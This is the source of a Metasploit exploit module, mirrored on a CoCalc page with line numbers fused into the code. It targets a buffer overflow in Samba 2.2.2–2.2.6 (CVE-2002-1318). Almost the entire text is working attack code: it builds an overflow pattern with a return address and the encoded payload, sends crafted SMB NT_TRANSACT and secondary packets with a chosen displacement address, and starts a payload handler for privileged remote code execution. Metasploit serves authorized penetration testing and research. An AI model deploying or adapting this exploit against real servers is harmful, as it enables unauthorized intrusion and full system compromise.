CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/samba/nttrans.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::SMB::Client910def initialize(info = {})11super(update_info(info,12'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',13'Description' => %q{14This module attempts to exploit a buffer overflow vulnerability present in15versions 2.2.2 through 2.2.6 of Samba.1617The Samba developers report this as:18"Bug in the length checking for encrypted password change requests from clients."1920The bug was discovered and reported by the Debian Samba Maintainers.21},22'Author' => [ 'hdm' ],23'License' => MSF_LICENSE,24'References' =>25[26[ 'CVE', '2002-1318' ],27[ 'OSVDB', '14525' ],28[ 'BID', '6210' ],29[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]30],31'Privileged' => true,32'Platform' => 'linux',33'Payload' =>34{35'Space' => 1024,36'BadChars' => "\x00",37'MinNops' => 512,38},39'Targets' =>40[41[ "Samba 2.2.x Linux x86",42{43'Arch' => ARCH_X86,44'Platform' => 'linux',45'Rets' => [0x01020304, 0x41424344],46},47],48],49'DisclosureDate' => '2003-04-07'50))5152register_options(53[54Opt::RPORT(139)55])5657deregister_options('SMB::ProtocolVersion')58end5960def exploit6162# 0x081fc9686364pattern = Rex::Text.pattern_create(12000)6566pattern[532, 4] = [0x81b847c].pack('V')67pattern[836, payload.encoded.length] = payload.encoded6869# 0x081b81387071connect(versions: [1])72smb_login7374targ_address = 0xfffbb7d07576#77# Send a NTTrans request with ParameterCountTotal set to the buffer length78#7980subcommand = 181param = ''82body = ''83setup_count = 084setup_data = ''85data = param + body8687pkt = CONST::SMB_NTTRANS_PKT.make_struct88self.simple.client.smb_defaults(pkt['Payload']['SMB'])8990base_offset = pkt.to_s.length + (setup_count * 2) - 491param_offset = base_offset92data_offset = param_offset + param.length9394pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT95pkt['Payload']['SMB'].v['Flags1'] = 0x1896pkt['Payload']['SMB'].v['Flags2'] = 0x200197pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count9899pkt['Payload'].v['ParamCountTotal'] =12000100pkt['Payload'].v['DataCountTotal'] = body.length101pkt['Payload'].v['ParamCountMax'] = 1024102pkt['Payload'].v['DataCountMax'] = 65504103pkt['Payload'].v['ParamCount'] = param.length104pkt['Payload'].v['ParamOffset'] = param_offset105pkt['Payload'].v['DataCount'] = body.length106pkt['Payload'].v['DataOffset'] = data_offset107pkt['Payload'].v['SetupCount'] = setup_count108pkt['Payload'].v['SetupData'] = setup_data109pkt['Payload'].v['Subcommand'] = subcommand110111pkt['Payload'].v['Payload'] = data112113self.simple.client.smb_send(pkt.to_s)114ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)115116#117# Send a NTTrans secondary request with the magic displacement118#119120param = pattern121body = ''122data = param + body123124pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct125self.simple.client.smb_defaults(pkt['Payload']['SMB'])126127base_offset = pkt.to_s.length - 4128param_offset = base_offset129data_offset = param_offset + param.length130131pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY132pkt['Payload']['SMB'].v['Flags1'] = 0x18133pkt['Payload']['SMB'].v['Flags2'] = 0x2001134pkt['Payload']['SMB'].v['WordCount'] = 18135136pkt['Payload'].v['ParamCountTotal'] = param.length137pkt['Payload'].v['DataCountTotal'] = body.length138pkt['Payload'].v['ParamCount'] = param.length139pkt['Payload'].v['ParamOffset'] = param_offset140pkt['Payload'].v['ParamDisplace'] = targ_address141pkt['Payload'].v['DataCount'] = body.length142pkt['Payload'].v['DataOffset'] = data_offset143144pkt['Payload'].v['Payload'] = data145146self.simple.client.smb_send(pkt.to_s)147ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)148149150handler151152end153end154155156